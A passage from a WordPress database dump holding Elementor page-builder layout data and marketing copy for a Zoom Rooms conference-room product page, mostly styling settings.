,\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"isInner\":false},{\"id\":\"ab89310\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"fcc54ee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Meet with anyone<\\/h4><p class=\\\"mt-1 mb-5\\\">Include remote participants on desktop, mobile, or other conference room systems.<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3c1657b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">One touch to start meetings<\\/h4><p class=\\\"mt-1 mb-5\\\">Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"406125c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Centralized management<\\/h4><p class=\\\"mt-1 mb-5\\\">Get the overview status and management of deployed conference rooms in a single admin console<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0518cb7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"92a3de4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c7f20ea\",\"elType\":\"widget\",\"settings\":{\"title\":\"Zoom Rooms includes the following value-added services at no additional cost.\",\"header_size\":\"h3\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc6dcbe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2576d197\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f0691d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Zoom for the\\u00a0Conference Room<\\/h3>\\r\\n<h4>Simple, flexible set up<\\/h4>\\r\\nBuild the room you need with the hardware you want on top on Zoom\\u2019s cloud-based platform.\\r\\n<h4>Modern capabilities<\\/h4>\\r\\nDeploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.\\r\\n<h4>Happy, productive users<\\/h4>\\r\\nWe focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.\\r\\n\\r\\n&nbsp;\\r\\n<h3>Capabilities that enhance the way people work<\\/h3>\\r\\n<h4 class=\\\"mb-1 mt-0\\\">HD video and audio<\\/h4>\\r\\n<p class=\\\"mt-1 mb-5\\\">Bring high quality video, audio, and web conferencing to your existing rooms.<\\/p>\\r\\n\\r\\n<h4 class=\\\"mb-1 mt-0\\\">Wireless sharing<\\/h4>\\r\\n<p class=\\\"mt-1 mb-5\\\">Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.<\\/p>\\r\\n\\r\\n<h4 class=\\\"mb-1 mt-0\\\">Interoperability with any video system<\\/h4>\\r\\n<p class=\\\"mt-1 mb-5\\\">Communicate with existing SIP or H.323 systems<\\/p>\\r\\n\\r\\n<h4 class=\\\"mb-1 mt-0\\\">Meet with anyone<\\/h4>\\r\\n<p class=\\\"mt-1 mb-5\\\">Include remote participants on desktop, mobile, or other conference room systems.<\\/p>\\r\\n\\r\\n<h4 class=\\\"mb-1 mt-0\\\">One touch to start meetings<\\/h4>\\r\\n<p class=\\\"mt-1 mb-5\\\">Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.<\\/p>\\r\\n\\r\\n<h4 class=\\\"mb-1 mt-0\\\">Centralized management<\\/h4>\\r\\n<p class=\\\"mt-1 mb-5\\\">Get the overview status and management of deployed conference rooms in a single admin console.<\\/p>\\r\\n&nbsp;\\r\\n<h3>Already have an existing video conference room system?<\\/h3>\\r\\nUse Zoom\\u2019s Conference Room Connector to extend your standards-based conference systems to the cloud. Zoom\\u2019s Conference Room Connector helps organizations leverage existing products through its life-cycle while delivering a consistent and unified communication experience.\\r\\n\\r\\n&nbsp;\\r\\n<h3>Zoom Rooms includes the following value-added services at no additional cost.<\\/h3>\\r\\n<h4>Digital Signage<\\/h4>\\r\\nDigital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.\\r\\n<ul>\\r\\n \\t<li>Leverage room displays when not in use<\\/li>\\r\\n \\t<li>Manage displays at scale or individually<\\/li>\\r\\n \\t<li>Unlimited amount of displays supported (both in and out of conference rooms)<\\/li>\\r\\n<\\/ul>\\r\\n<h4>Scheduling Display<\\/h4>\\r\\nEnd scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.\\r\\n<h4>Make interactive collaboration easy with touch screens<\\/h4>\\r\\nPower up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotation all at the tip of your fingers.\\r\\n<h4>Flawless video conferencing for every space<\\/h4>\\r\\nUnleash the power of cloud-based video conferencing anywhere work gets done.\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6148,3049,'_wp_page_template','template-fullwidth.php'),(6149,3049,'_elementor_edit_mode','builder'),(6150,3049,'_elementor_template_type','post'),(6151,3049,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(6152,3049,'_elementor_data','[{\"id\":\"cad15a9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5c7499\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"96a0357\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Zoom for the Conference Room<\\/h2><h3>Software-based, flawless video, integrated audio, and wireless content sharing<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66635b2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1e75488\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5affd82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Simple, flexible set up<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">Build the room you need with the hardware you want on top on Zoom\\u2019s cloud-based platform.<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d999cea\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6757f8b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Modern capabilities<\\/h3><p>Deploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2b51dbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ff854f8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Happy, productive users<\\/h3><p>We focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at 